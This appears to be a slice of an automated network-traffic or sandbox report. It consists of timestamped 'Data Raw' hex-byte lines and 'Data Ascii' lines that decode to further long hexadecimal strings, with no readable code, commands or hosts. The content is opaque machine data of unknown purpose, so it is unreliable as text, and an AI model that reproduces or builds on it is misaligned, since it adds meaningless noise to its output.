                                                                                                                            2022-10-03 14:01:58 UTC944INData Raw: 34 37 39 38 43 39 35 46 31 46 39 31 45 37 31 34 33 42 39 46 41 46 31 43 39 35 30 46 43 38 43 45 46 45 46 41 41 38 37 43 36 33 45 33 39 45 33 31 34 37 36 35 39 39 34 31 39 34 37 46 31 42 43 34 46 44 46 44 36 33 38 45 43 39 34 41 43 43 32 37 38 31 38 37 30 30 44 37 36 36 32 45 33 36 31 42 45 36 33 37 45 36 42 38 36 43 43 34 35 43 30 39 33 38 30 45 42 38 39 42 45 32 42 31 36 32 38 31 32 37 37 45 31 41 37 39 34 32 32 36 33 32 30 46 45 41 38 35 45 44 33 39 32 31 35 37 33 31 46 37 45 43 38 35 43 46 32 33 42 45 39 31 46 42 39 38 38 46 43 31 46 44 36 38 37 34 43 43 34 39 37 39 39 42 42 39 41 46 45 32 35 33 33 32 32 43 35 38 42 35 35 46 30 34 35 43 38 33 46 35 31 39 37 33 35 41 41 36 30 35 39 33 46 44 35 34 32 39 46 35 33 43 35 32 45 36 31 39 34 32 44 43 42 42 42
                                                                                                                            Data Ascii: 4798C95F1F91E7143B9FAF1C950FC8CEFEFAA87C63E39E3147659941947F1BC4FDFD638EC94ACC27818700D7662E361BE637E6B86CC45C09380EB89BE2B16281277E1A794226320FEA85ED39215731F7EC85CF23BE91FB988FC1FD6874CC49799BB9AFE253322C58B55F045C83F519735AA60593FD5429F53C52E61942DCBBB
                                                                                                                            2022-10-03 14:01:58 UTC960INData Raw: 32 31 44 46 42 35 33 32 39 39 34 42 34 45 34 32 42 45 36 46 35 44 36 31 45 45 41 31 45 43 30 46 41 44 38 36 39 33 38 39 32 46 31 43 43 30 46 35 46 31 44 38 39 41 33 46 39 39 45 32 38 37 37 46 32 30 39 45 31 38 39 42 46 31 44 34 44 41 43 30 35 43 36 43 39 41 31 30 44 33 33 32 39 45 35 39 43 37 32 36 35 33 37 42 35 36 43 32 46 44 33 32 32 42 45 33 42 39 37 35 39 41 31 39 44 46 39 33 35 45 39 41 46 31 39 42 37 35 38 39 46 39 45 41 36 30 39 43 41 46 44 46 41 44 45 42 43 43 44 44 46 42 31 31 44 46 41 33 46 41 33 43 39 32 31 46 45 30 46 45 46 42 44 44 37 41 43 41 33 43 45 35 30 31 45 45 43 46 44 46 41 44 35 37 39 33 45 44 46 45 45 38 38 35 32 35 41 36 44 38 46 44 43 44 30 42 41 42 44 45 31 34 42 42 42 46 46 39 43 33 36 41 33 32 43 35 45 45 36 46 46 45 42 34 44
                                                                                                                            Data Ascii: 21DFB532994B4E42BE6F5D61EEA1EC0FAD8693892F1CC0F5F1D89A3F99E2877F209E189BF1D4DAC05C6C9A10D3329E59C726537B56C2FD322BE3B9759A19DF935E9AF19B7589F9EA609CAFDFADEBCCDDFB11DFA3FA3C921FE0FEFBDD7ACA3CE501EECFDFAD5793EDFEE88525A6D8FDCD0BABDE14BBBFF9C36A32C5EE6FFEB4D
                                                                                                                            2022-10-03 14:01:58 UTC976INData Raw: 37 39 33 45 37 32 46 46 33 30 42 36 39 45 45 41 41 46 32 43 34 35 46 45 33 38 38 43 33 44 45 46 45 45 41 46 41 43 42 32 44 39 33 33 34 30 35 39 36 37 37 32 41 41 37 39 37 45 46 44 36 31 46 34 30 30 45 35 30 30 45 41 46 37 42 44 34 39 38 38 36 37 43 43 30 30 45 35 39 38 43 39 32 31 41 45 36 31 33 37 44 39 46 45 37 38 38 30 39 32 38 35 46 32 36 36 37 37 35 39 37 39 30 45 35 34 38 38 46 39 42 37 43 35 30 39 45 35 36 42 33 31 38 43 31 37 39 43 42 37 36 41 33 30 33 45 30 43 43 41 36 36 44 38 30 46 30 46 35 32 37 43 30 36 34 32 37 44 33 31 46 44 38 36 35 31 38 33 31 34 44 46 38 31 31 30 37 46 39 45 38 37 32 43 42 45 32 31 34 41 45 35 38 31 39 30 42 45 46 31 39 30 38 44 39 37 34 33 39 34 35 41 32 38 46 46 45 35 30 43 39 33 42 46 41 46 44 34 34 37 46 39 46 45 33
                                                                                                                            Data Ascii: 793E72FF30B69EEAAF2C45FE388C3DEFEEAFACB2D93340596772AA797EFD61F400E500EAF7BD498867CC00E598C921AE6137D9FE78809285F2667759790E5488F9B7C509E56B318C179CB76A303E0CCA66D80F0F527C06427D31FD86518314DF81107F9E872CBE214AE58190BEF1908D9743945A28FFE50C93BFAFD447F9FE3
                                                                                                                            2022-10-03 14:01:58 UTC992INData Raw: 41 36 33 46 44 35 37 30 33 35 31 36 44 33 30 46 33 35 46 32 33 36 31 36 44 33 30 46 33 33 32 41 33 35 31 36 44 33 30 46 33 37 41 41 33 35 31 36 44 33 30 46 33 37 41 41 33 34 43 31 46 36 37 44 39 42 45 44 36 46 43 32 38 44 35 41 34 44 43 34 46 34 43 33 30 44 46 46 32 36 36 32 46 41 45 31 34 36 32 30 43 41 31 42 36 43 36 36 46 37 44 37 34 35 31 38 33 33 39 41 38 38 45 39 34 37 31 41 36 39 34 44 43 34 46 34 41 33 38 43 30 44 34 44 43 34 46 34 41 33 38 44 46 34 32 36 36 32 46 41 44 31 43 36 38 45 41 36 31 30 37 46 39 30 31 39 37 46 42 34 37 31 41 30 41 39 39 38 37 45 42 34 37 31 42 34 41 39 39 38 37 45 42 34 37 31 31 36 45 35 35 45 33 34 42 44 36 41 41 39 33 31 34 36 43 44 36 36 36 32 46 41 42 31 38 36 37 46 33 33 31 38 33 46 46 32 44 46 41 37 46 42 42 42 44
                                                                                                                            Data Ascii: A63FD5703516D30F35F23616D30F332A3516D30F37AA3516D30F37AA34C1F67D9BED6FC28D5A4DC4F4C30DFF2662FAE14620CA1B6C66F7D74518339A88E9471A694DC4F4A38C0D4DC4F4A38DF42662FAD1C68EA6107F90197FB471A0A9987EB471B4A9987EB47116E55E34BD6AA93146CD6662FAB1867F33183FF2DFA7FBBBD
                                                                                                                            2022-10-03 14:01:58 UTC1008INData Raw: 34 36 43 35 36 46 42 43 39 43 45 36 41 46 31 31 45 41 37 43 41 45 46 37 30 34 46 31 35 42 45 43 31 43 43 41 33 32 37 38 38 42 43 37 46 32 37 36 34 46 38 43 46 36 38 45 44 31 44 45 41 44 45 38 35 36 46 34 32 32 46 34 32 32 46 34 37 38 34 46 42 45 37 46 38 46 30 38 43 38 31 44 41 35 36 37 42 35 46 33 45 41 36 39 34 41 42 44 45 43 42 31 45 35 46 44 41 31 36 38 44 42 45 46 44 36 42 45 38 44 46 30 33 37 33 44 34 42 31 43 42 42 44 45 32 43 37 31 36 45 46 45 34 38 38 37 32 37 39 43 46 41 36 42 46 34 46 43 34 44 39 30 46 45 31 32 34 37 38 46 36 46 42 37 37 37 42 39 36 33 43 37 46 42 37 32 43 37 41 45 38 42 45 35 46 45 45 39 33 32 32 46 38 36 37 39 32 42 46 43 44 46 42 44 34 33 38 46 39 46 30 41 46 46 41 38 37 42 37 35 46 42 41 44 46 36 35 37 42 42 31 44 33 35 44
                                                                                                                            Data Ascii: 46C56FBC9CE6AF11EA7CAEF704F15BEC1CCA32788BC7F2764F8CF68ED1DEADE856F422F422F4784FBE7F8F08C81DA567B5F3EA694ABDECB1E5FDA168DBEFD6BE8DF0373D4B1CBBDE2C716EFE4887279CFA6BF4FC4D90FE12478F6FB777B963C7FB72C7AE8BE5FEE9322F86792BFCDFBD438F9F0AFFA87B75FBADF657BB1D35D
                                                                                                                            2022-10-03 14:01:58 UTC1024INData Raw: 35 31 41 42 46 43 35 46 39 33 45 42 38 33 46 45 44 37 45 35 42 41 43 36 35 46 33 42 41 42 34 34 41 35 46 43 37 37 43 38 46 35 30 39 46 46 30 37 37 32 44 44 45 30 33 46 46 46 34 32 32 39 42 33 46 46 37 39 42 39 36 45 46 36 31 46 46 39 32 35 36 39 34 46 46 46 35 37 36 35 31 36 36 46 46 37 41 46 46 43 44 32 32 30 46 35 37 33 46 46 39 46 39 41 34 41 39 34 32 41 42 38 46 46 34 42 35 32 44 41 30 32 46 44 33 37 34 37 30 41 30 41 31 45 46 41 39 32 35 42 30 35 30 42 31 45 39 31 36 42 35 39 34 31 38 37 46 38 31 46 32 38 44 30 41 44 41 31 30 32 42 41 33 35 33 43 30 31 44 44 31 41 30 35 30 31 44 44 34 41 43 31 38 30 31 45 32 31 36 35 30 31 33 44 34 32 38 36 30 34 46 34 30 38 31 39 31 31 44 30 32 33 41 34 33 32 42 30 35 30 44 32 43 46 31 34 41 36 32 34 43 44 44 37 30
                                                                                                                            Data Ascii: 51ABFC5F93EB83FED7E5BAC65F3BAB44A5FC77C8F509FF0772DDE03FFF4229B3FF79B96EF61FF925694FFF5765166FF7AFFCD220F573FF9F9A4A942AB8FF4B52DA02FD37470A0A1EFA925B050B1E916B594187F81F28D0ADA102BA353C01DD1A0501DD4AC1801E2165013D428604F4081911D023A432B050D2CF14A624CDD70
                                                                                                                            2022-10-03 14:01:58 UTC1040INData Raw: 45 43 30 36 43 36 31 35 30 43 32 46 36 36 33 44 42 45 31 31 33 46 31 38 42 39 39 31 46 36 42 45 39 31 37 33 30 38 33 41 34 44 42 38 42 41 38 39 46 34 36 31 45 34 32 36 43 36 31 44 43 43 43 31 45 34 31 32 46 36 45 39 32 35 43 34 34 37 36 37 36 31 30 45 42 42 42 41 39 39 37 35 45 39 36 36 39 42 35 46 31 34 41 44 36 39 44 41 30 31 31 44 34 37 32 37 36 31 31 41 36 36 41 31 42 41 38 35 46 39 37 42 30 42 45 42 33 39 33 41 30 43 31 33 44 38 35 33 33 30 37 41 31 42 45 39 34 33 39 35 32 30 46 44 33 42 34 38 31 46 36 36 41 31 35 41 34 36 46 41 43 42 31 38 35 37 33 30 42 37 43 43 46 36 36 46 46 32 34 45 44 36 39 46 33 42 35 39 32 37 45 45 32 32 33 44 39 38 38 36 36 41 33 39 46 37 32 37 33 30 30 41 45 33 33 30 30 39 44 33 37 39 42 46 42 42 33 39 38 37 44 44 34 44 42
                                                                                                                            Data Ascii: EC06C6150C2F663DBE113F18B991F6BE9173083A4DB8BA89F461E426C61DCCC1E412F6E925C44767610EBBBA9975E9669B5F14AD69DA011D4727611A66A1BA85F97B0BEB393A0C13D853307A1BE9439520FD3B481F66A15A46FACB185730B7CCF66FF24ED69F3B5927EE223D98866A39F727300AE33009D379BFBB3987DD4DB
                                                                                                                            2022-10-03 14:01:58 UTC1056INData Raw: 46 43 44 43 37 31 30 42 46 30 32 42 43 37 41 44 43 30 36 46 31 44 33 42 38 30 44 46 33 39 45 45 41 30 36 35 43 36 37 31 31 37 46 30 37 42 43 37 33 44 42 34 43 43 33 38 45 45 30 33 46 45 45 43 44 38 34 39 43 42 38 30 45 33 34 31 39 41 33 42 45 39 42 42 38 30 43 37 41 35 45 46 43 31 35 44 46 41 30 30 44 31 41 46 41 35 33 46 30 43 44 45 31 37 38 38 46 45 32 38 46 44 35 31 45 30 41 38 46 34 37 44 33 34 38 35 44 33 39 46 30 30 34 45 34 42 37 46 30 41 33 38 33 44 46 44 31 39 45 30 38 43 46 34 45 37 41 30 45 39 30 31 43 32 42 41 34 42 37 46 30 31 37 38 35 41 46 41 38 42 33 34 46 35 44 32 35 46 41 36 41 39 39 37 46 45 32 41 34 44 42 44 46 34 44 37 36 38 45 41 41 35 42 46 34 31 44 33 32 44 46 44 34 44 45 30 46 32 46 34 42 37 38 31 41 42 44 33 30 46 45 30 44 43 33
                                                                                                                            Data Ascii: FCDC710BF02BC7ADC06F1D3B80DF39EEA065C67117F07BC73DB4CC38EE03FEECD849CB80E3419A3BE9BB80C7A5EFC15DFA00D1AFA53F0CDE1788FE28FD51E0A8F47D3485D39F004E4B7F0A383DFD19E08CF4E7A0E901C2BA4B7F01785AFA8B34F5D25FA6A997FE2A4DBDF4D768EAA5BF41D32DFD4DE0F2F4B781ABD30FE0DC3
                                                                                                                            2022-10-03 14:01:58 UTC1072INData Raw: 39 43 34 45 46 41 41 32 36 31 39 30 44 44 41 30 39 46 38 34 46 35 31 45 31 39 38 45 45 31 39 45 35 45 43 33 45 30 31 35 38 42 32 31 43 42 38 32 31 44 30 36 37 31 37 35 32 38 44 41 31 39 30 39 43 34 46 37 30 44 39 38 42 37 39 42 37 31 30 46 34 44 44 39 32 45 44 34 42 31 34 38 33 38 37 34 32 43 44 41 32 32 36 44 46 35 36 37 44 34 30 37 36 39 35 39 36 35 45 39 34 30 32 33 43 45 44 43 38 35 45 31 32 30 36 42 38 34 43 35 32 38 41 38 42 36 31 33 35 45 42 34 46 45 43 43 35 44 32 30 41 31 42 45 30 44 41 44 32 42 35 46 33 44 36 43 31 33 38 35 46 43 43 34 43 45 33 30 42 32 38 30 39 39 44 33 41 34 35 43 34 43 42 38 32 46 36 42 36 41 41 41 46 30 33 35 32 46 34 33 45 45 30 41 42 39 42 34 38 43 39 32 34 33 33 34 43 33 32 38 33 39 32 38 38 35 46 35 39 32 41 43 45 38 46
                                                                                                                            Data Ascii: 9C4EFAA26190DDA09F84F51E198EE19E5EC3E0158B21CB821D06717528DA1909C4F70D98B79B710F4DD92ED4B14838742CDA226DF567D407695965E94023CEDC85E1206B84C528A8B6135EB4FECC5D20A1BE0DAD2B5F3D6C1385FCC4CE30B28099D3A45C4CB82F6B6AAAF0352F43EE0AB9B48C924334C328392885F592ACE8F
                                                                                                                            2022-10-03 14:01:58 UTC1088INData Raw: 39 42 30 39 42 31 36 44 45 43 38 31 45 45 44 33 31 33 31 30 35 30 37 32 36 31 34 30 36 30 31 39 44 39 30 42 42 30 46 36 36 34 46 44 38 43 31 42 43 45 31 36 44 39 42 31 45 35 36 33 32 37 46 30 39 32 33 31 31 32 43 35 44 37 34 38 46 31 43 30 34 34 30 39 37 39 37 45 31 35 30 31 36 32 38 44 37 42 32 46 34 30 46 41 34 33 46 36 42 36 34 38 37 44 37 38 37 37 46 32 38 30 37 43 33 45 30 36 32 34 38 32 37 44 31 30 36 39 39 35 44 35 41 41 46 30 45 30 41 34 45 44 45 42 42 33 45 41 36 44 38 38 33 33 34 35 39 30 31 30 38 38 36 35 33 46 35 43 33 46 45 42 34 31 45 38 36 35 39 32 34 38 41 35 35 31 34 42 42 30 42 45 35 43 35 44 33 45 31 46 41 39 38 38 37 42 41 38 43 34 38 32 39 44 32 41 37 45 35 37 45 38 31 35 36 44 42 34 43 43 32 44 37 37 39 46 38 30 33 30 36 41 39 30 30
                                                                                                                            Data Ascii: 9B09B16DEC81EED31310507261406019D90BB0F664FD8C1BCE16D9B1E56327F0923112C5D748F1C04409797E1501628D7B2F40FA43F6B6487D7877F2807C3E0624827D106995D5AAF0E0A4EDEBB3EA6D883345901088653F5C3FEB41E8659248A5514BB0BE5C5D3E1FA9887BA8C4829D2A7E57E8156DB4CC2D779F80306A900
                                                                                                                            2022-10-03 14:01:58 UTC1104INData Raw: 33 43 30 43 39 30 34 45 31 35 41 38 45 36 34 34 37 41 37 45 35 38 30 37 33 46 43 37 30 45 30 44 33 45 37 41 44 45 46 30 46 46 44 37 39 41 31 42 45 30 44 46 35 31 46 38 39 46 35 44 37 38 41 36 42 38 31 36 30 36 45 45 35 41 37 33 32 46 46 43 37 46 32 44 30 43 44 43 42 35 42 30 38 32 31 36 43 34 44 35 41 30 31 44 46 36 39 45 45 30 46 46 38 46 39 39 43 43 39 30 33 46 36 39 43 44 31 30 34 45 44 39 36 35 45 39 34 33 42 33 46 33 35 33 33 32 31 39 31 45 42 31 34 34 33 39 39 45 43 32 46 45 44 33 34 45 43 37 39 37 45 34 39 39 39 38 37 45 35 38 45 31 44 30 33 34 46 34 41 30 45 38 36 41 34 35 35 36 34 42 38 30 37 43 36 45 34 38 34 36 33 45 36 45 45 44 30 35 42 31 34 37 42 34 30 43 34 42 34 41 41 46 32 36 41 37 39 46 32 31 45 32 37 34 39 39 35 36 41 44 44 36 33 38 41
                                                                                                                            Data Ascii: 3C0C904E15A8E6447A7E58073FC70E0D3E7ADEF0FFD79A1BE0DF51F89F5D78A6B81606EE5A732FFC7F2D0CDCB5B08216C4D5A01DF69EE0FF8F99CC903F69CD104ED965E943B3F35332191EB144399EC2FED34EC797E499987E58E1D034F4A0E86A45564B807C6E48463E6EED05B147B40C4B4AAF26A79F21E2749956ADD638A
                                                                                                                            2022-10-03 14:01:58 UTC1120INData Raw: 43 32 46 46 36 37 45 39 46 46 42 44 46 30 45 46 31 36 46 38 43 35 44 36 39 44 30 32 45 38 43 44 33 34 39 38 33 37 38 31 43 42 39 35 37 39 32 33 45 30 46 46 30 46 31 42 33 33 31 39 41 36 46 46 39 34 31 30 43 38 38 38 35 42 35 39 36 30 36 41 38 35 35 41 46 42 41 34 33 44 42 35 42 31 45 38 44 32 38 44 34 32 39 31 42 39 39 37 42 31 33 31 41 44 45 38 33 43 45 36 46 36 43 30 42 46 42 42 38 44 31 39 42 42 31 41 43 32 35 34 43 33 46 33 30 36 44 33 33 30 46 45 41 44 37 36 36 36 45 34 36 41 43 39 34 42 38 35 42 44 34 43 45 45 37 37 45 31 43 30 46 33 42 42 35 32 34 37 37 33 45 33 44 35 34 36 46 35 35 39 46 39 38 45 39 44 43 35 31 36 35 36 43 38 31 34 45 39 36 39 33 33 32 37 34 37 35 43 39 35 33 43 43 43 30 43 35 43 34 44 31 30 44 34 34 35 33 33 39 37 35 46 39 44 31
                                                                                                                            Data Ascii: C2FF67E9FFBDF0EF16F8C5D69D02E8CD34983781CB957923E0FF0F1B3319A6FF9410C8885B59606A855AFBA43DB5B1E8D28D4291B997B131ADE83CE6F6C0BFBB8D19BB1AC254C3F306D330FEAD7666E46AC94B85BD4CEE77E1C0F3BB524773E3D546F559F98E9DC51656C814E9693327475C953CCC0C5C4D10D44533975F9D1
                                                                                                                            2022-10-03 14:01:58 UTC1136INData Raw: 44 38 35 41 34 36 33 36 42 45 35 44 32 39 38 43 32 41 39 32 46 34 30 45 30 46 46 44 45 33 33 44 31 34 30 38 37 34 38 43 43 42 34 42 32 42 43 39 33 42 45 31 42 37 34 39 31 41 31 45 33 35 34 38 30 41 34 41 41 42 41 45 30 46 35 37 46 32 46 44 45 35 41 39 46 32 44 41 34 46 46 31 32 43 38 32 43 44 38 36 35 31 46 38 30 39 46 34 31 36 37 38 38 31 44 34 30 32 30 34 33 45 42 32 46 36 38 33 31 32 38 35 42 44 34 44 43 42 45 41 42 42 39 30 36 34 34 46 31 45 43 46 39 36 37 46 34 33 39 35 31 44 35 39 42 46 31 45 30 46 45 46 35 30 30 35 43 41 30 44 33 33 43 34 43 43 35 38 45 44 38 42 41 32 38 38 37 30 45 36 31 35 35 36 31 34 35 33 42 41 39 43 43 34 36 43 44 38 30 31 43 33 33 42 38 41 35 33 41 39 33 46 41 46 32 41 36 44 34 35 45 32 38 39 42 32 37 33 33 38 36 33 36 46 37
                                                                                                                            Data Ascii: D85A4636BE5D298C2A92F40E0FFDE33D1408748CCB4B2BC93BE1B7491A1E35480A4AABAE0F57F2FDE5A9F2DA4FF12C82CD8651F809F4167881D402043EB2F6831285BD4DCBEABB90644F1ECF967F43951D59BF1E0FEF5005CA0D33C4CC58ED8BA28870E615561453BA9CC46CD801C33B8A53A93FAF2A6D45E289B27338636F7
                                                                                                                            2022-10-03 14:01:58 UTC1152INData Raw: 33 35 34 41 38 31 41 31 35 41 31 46 39 31 39 44 35 41 30 46 45 36 36 46 46 34 36 34 46 45 34 36 45 43 38 30 31 42 37 44 38 31 39 33 41 32 33 44 45 46 34 41 33 41 43 37 44 45 32 38 37 32 36 42 32 33 33 36 39 45 41 30 39 33 31 32 44 34 35 41 35 32 38 44 37 38 39 32 44 32 35 32 41 41 42 35 35 32 36 37 39 34 34 39 44 30 41 44 42 34 35 39 36 31 34 45 42 32 35 35 30 39 30 38 37 31 37 36 42 44 44 35 30 33 45 31 35 36 36 43 37 34 37 41 37 32 38 35 44 32 34 36 38 46 41 45 44 30 42 45 38 30 36 37 35 37 39 30 42 32 41 44 42 34 39 39 42 36 36 32 33 45 34 30 41 30 36 36 30 34 34 42 34 46 37 34 32 42 35 44 34 42 39 33 34 30 46 42 45 42 41 38 33 30 44 31 37 41 46 34 32 42 31 39 33 34 44 38 36 31 45 34 30 38 38 44 41 33 45 33 41 44 35 41 44 30 36 41 37 38 35 38 39 38 33
                                                                                                                            Data Ascii: 354A81A15A1F919D5A0FE66FF464FE46EC801B7D8193A23DEF4A3AC7DE28726B23369EA09312D45A528D7892D252AAB552679449D0ADB459614EB25509087176BDD503E1566C747A7285D2468FAED0BE80675790B2ADB499B6623E40A066044B4F742B5D4B9340FBEBA830D17AF42B1934D861E4088DA3E3AD5AD06A7858983
                                                                                                                            2022-10-03 14:01:58 UTC1168INData Raw: 43 39 46 37 35 46 33 41 31 46 44 31 41 45 44 37 36 45 45 42 45 39 43 32 45 46 34 36 45 34 34 34 33 44 33 45 33 37 36 44 35 30 44 38 42 30 36 44 41 33 32 45 30 46 45 38 31 35 33 42 41 45 45 32 45 43 44 33 39 44 39 36 46 43 33 32 41 41 46 33 31 35 46 42 45 35 42 41 34 46 39 45 38 43 37 38 37 30 45 37 30 32 45 33 42 37 44 41 41 35 33 44 34 46 37 35 46 41 42 43 32 31 37 39 43 45 45 30 41 46 36 35 36 35 41 36 36 45 34 33 32 37 36 39 34 43 38 46 30 46 35 44 42 43 46 30 45 30 32 46 46 43 38 34 35 42 38 31 41 46 42 37 39 38 39 32 31 44 39 46 45 34 37 33 41 37 34 42 41 37 39 34 39 46 39 37 44 38 41 45 42 34 44 44 33 43 37 31 35 42 31 30 46 46 45 45 45 41 32 43 44 37 38 45 32 46 36 45 38 46 34 42 41 44 45 39 42 30 36 36 43 31 45 36 42 44 30 46 34 46 35 34 31 39 32
                                                                                                                            Data Ascii: C9F75F3A1FD1AED76EEBE9C2EF46E4443D3E376D50D8B06DA32E0FE8153BAEE2ECD39D96FC32AAF315FBE5BA4F9E8C7870E702E3B7DAA53D4F75FABC2179CEE0AF6565A66E4327694C8F0F5DBCF0E02FFC845B81AFB798921D9FE473A74BA7949F97D8AEB4DD3C715B10FFEEEA2CD78E2F6E8F4BADE9B066C1E6BD0F4F54192
                                                                                                                            2022-10-03 14:01:58 UTC1184INData Raw: 38 37 41 46 34 43 38 39 37 42 37 38 30 46 31 30 37 37 46 37 44 37 45 36 42 32 42 41 34 42 38 39 45 44 38 46 46 37 30 30 39 38 44 42 37 38 38 32 43 45 44 44 44 44 42 43 43 32 36 33 42 34 45 30 30 37 38 43 35 44 44 31 42 36 45 33 31 46 44 36 38 35 36 31 43 31 30 30 43 42 39 39 31 41 30 44 45 31 41 34 32 32 38 37 34 34 32 32 31 45 42 34 32 38 42 33 45 33 35 44 37 31 32 31 44 39 31 34 32 37 31 33 42 41 39 31 33 35 32 32 38 44 38 33 36 46 31 35 35 38 38 44 36 46 35 44 31 41 39 30 35 39 32 30 33 41 42 35 38 33 38 30 30 35 35 36 42 38 32 31 39 42 31 43 41 43 32 45 34 37 30 37 45 43 43 30 30 43 39 43 46 32 31 33 37 36 44 44 43 38 43 33 39 35 42 35 44 45 34 46 34 31 30 44 34 33 45 46 35 45 37 41 33 45 38 46 46 38 36 42 44 35 37 34 43 35 43 32 30 44 33 36 36 39 32
                                                                                                                            Data Ascii: 87AF4C897B780F1077F7D7E6B2BA4B89ED8FF70098DB7882CEDDDDBCC263B4E0078C5DD1B6E31FD68561C100CB991A0DE1A4228744221EB428B3E35D7121D9142713BA9135228D836F15588D6F5D1A9059203AB583800556B8219B1CAC2E4707ECC00C9CF21376DDC8C395B5DE4F410D43EF5E7A3E8FF86BD574C5C20D36692
                                                                                                                            2022-10-03 14:01:58 UTC1200INData Raw: 46 37 33 41 45 39 38 30 37 44 42 39 36 41 41 33 37 44 42 43 39 43 43 36 38 30 34 38 30 36 43 43 33 38 46 33 38 35 33 44 44 41 36 36 43 46 42 46 38 33 33 36 36 45 35 44 46 32 36 38 32 34 32 35 36 37 34 32 41 37 36 31 38 38 45 30 32 45 34 37 39 33 38 39 35 39 36 33 37 42 37 32 46 38 44 45 30 36 34 31 38 30 43 41 41 30 42 38 38 46 32 43 45 43 37 45 32 43 42 45 30 45 37 35 32 39 31 35 35 31 38 46 33 39 33 36 38 43 44 37 41 34 32 36 42 39 41 43 41 30 38 45 42 30 39 44 36 45 32 34 43 43 36 33 31 32 33 33 36 36 44 34 42 37 42 30 31 42 37 38 31 34 30 39 38 44 38 35 42 46 38 31 39 34 39 37 31 44 39 46 34 37 41 43 35 46 41 41 31 33 36 38 32 41 44 44 41 30 36 37 31 41 44 36 32 45 45 33 32 41 37 36 42 35 41 38 41 31 44 46 46 32 32 31 33 37 46 31 36 43 37 34 38 31 30
                                                                                                                            Data Ascii: F73AE9807DB96AA37DBC9CC6804806CC38F3853DDA66CFBF83366E5DF26824256742A76188E02E47938959637B72F8DE064180CAA0B88F2CEC7E2CBE0E752915518F39368CD7A426B9ACA08EB09D6E24CC63123366D4B7B01B7814098D85BF8194971D9F47AC5FAA13682ADDA0671AD62EE32A76B5A8A1DFF22137F16C74810
                                                                                                                            2022-10-03 14:01:58 UTC1216INData Raw: 45 32 37 32 42 31 35 31 38 32 46 31 38 46 34 43 45 45 33 32 45 43 32 30 35 30 44 44 37 46 33 30 35 30 38 42 37 42 38 39 45 45 45 33 31 37 34 42 39 45 44 35 42 31 32 34 30 33 44 41 30 30 39 36 31 34 35 34 46 32 44 44 38 36 45 37 46 41 34 43 37 45 36 38 46 46 30 34 30 33 32 31 33 44 34 38 43 45 46 38 37 33 38 36 45 42 46 36 31 33 31 32 35 37 44 34 31 42 42 38 34 32 31 42 45 41 46 39 43 31 31 35 38 46 37 46 34 31 45 46 45 39 39 36 41 35 39 46 30 32 33 44 39 45 41 33 31 35 44 31 45 33 43 36 42 44 34 37 44 32 46 32 34 37 43 36 34 42 37 41 44 44 32 32 43 34 32 31 38 45 37 41 33 30 46 43 30 37 42 38 33 42 36 43 41 34 46 35 42 44 35 31 37 33 31 41 44 34 43 46 34 34 37 43 41 44 46 34 31 46 45 30 45 39 33 32 37 45 36 41 36 46 44 32 42 43 45 33 45 33 41 32 30 37 41
                                                                                                                            Data Ascii: E272B15182F18F4CEE32EC2050DD7F30508B7B89EEE3174B9ED5B12403DA00961454F2DD86E7FA4C7E68FF0403213D48CEF87386EBF6131257D41BB8421BEAF9C1158F7F41EFE996A59F023D9EA315D1E3C6BD47D2F247C64B7ADD22C4218E7A30FC07B83B6CA4F5BD51731AD4CF447CADF41FE0E9327E6A6FD2BCE3E3A207A
                                                                                                                            2022-10-03 14:01:58 UTC1232INData Raw: 39 34 35 39 46 33 30 41 42 32 42 46 36 30 35 32 37 36 45 44 36 38 33 35 37 39 31 30 36 30 31 38 35 41 31 46 42 46 36 31 37 30 39 42 39 33 46 43 30 38 44 32 41 31 46 39 32 43 34 45 44 35 38 44 37 46 36 30 37 45 35 32 42 35 45 37 39 33 30 42 42 34 32 36 31 41 36 37 36 43 41 37 37 41 38 33 33 45 37 37 30 37 43 46 35 38 34 31 39 45 34 45 35 37 41 41 38 31 33 31 31 30 37 41 46 42 33 42 35 38 37 46 42 46 45 44 36 46 36 41 43 32 39 32 32 36 46 37 41 45 30 30 32 30 38 45 30 41 33 34 45 43 34 36 31 38 38 41 42 35 46 38 34 39 33 42 38 39 38 38 37 38 37 32 46 43 33 35 45 45 46 42 44 36 31 38 41 32 46 30 44 36 33 32 36 39 35 36 42 36 33 35 35 42 35 35 39 31 34 30 45 37 46 37 45 45 34 42 46 39 32 43 30 44 44 44 46 33 44 30 35 36 33 32 35 42 30 35 45 33 39 44 44 34 31
                                                                                                                            Data Ascii: 9459F30AB2BF605276ED6835791060185A1FBF61709B93FC08D2A1F92C4ED58D7F607E52B5E7930BB4261A676CA77A833E7707CF58419E4E57AA8131107AFB3B587FBFED6F6AC29226F7AE00208E0A34EC46188AB5F8493B89887872FC35EEFBD618A2F0D6326956B6355B559140E7F7EE4BF92C0DDDF3D056325B05E39DD41
                                                                                                                            2022-10-03 14:01:58 UTC1248INData Raw: 33 32 43 39 38 31 31 38 42 35 32 35 31 45 42 37 36 44 34 38 43 36 43 45 44 38 39 38 36 31 39 36 46 38 43 34 41 45 30 46 32 33 36 31 46 36 42 34 30 43 36 44 37 36 37 35 32 44 39 41 42 42 30 36 44 34 33 44 45 42 43 39 43 35 43 36 41 45 44 43 36 33 31 42 41 44 34 30 38 32 43 36 38 42 45 32 31 45 36 34 34 39 42 45 46 30 36 37 32 39 35 43 39 37 39 42 33 39 35 43 34 46 43 31 34 43 35 33 37 45 34 32 31 44 36 34 45 39 36 44 43 44 38 34 37 35 42 45 30 43 44 44 44 39 33 38 39 45 44 35 32 46 43 30 45 32 42 34 35 30 44 32 37 37 43 44 38 43 44 31 45 37 37 43 34 35 44 35 43 35 45 37 33 46 35 43 31 39 44 34 30 42 34 37 44 33 32 33 39 36 33 46 45 31 41 35 32 34 45 42 42 30 36 41 38 46 39 34 33 44 44 45 38 32 43 46 36 46 43 45 30 44 32 36 37 30 35 46 31 34 45 41 36 31 35
                                                                                                                            Data Ascii: 32C98118B5251EB76D48C6CED8986196F8C4AE0F2361F6B40C6D76752D9ABB06D43DEBC9C5C6AEDC631BAD4082C68BE21E6449BEF067295C979B395C4FC14C537E421D64E96DCD8475BE0CDDD9389ED52FC0E2B450D277CD8CD1E77C45D5C5E73F5C19D40B47D323963FE1A524EBB06A8F943DDE82CF6FCE0D26705F14EA615
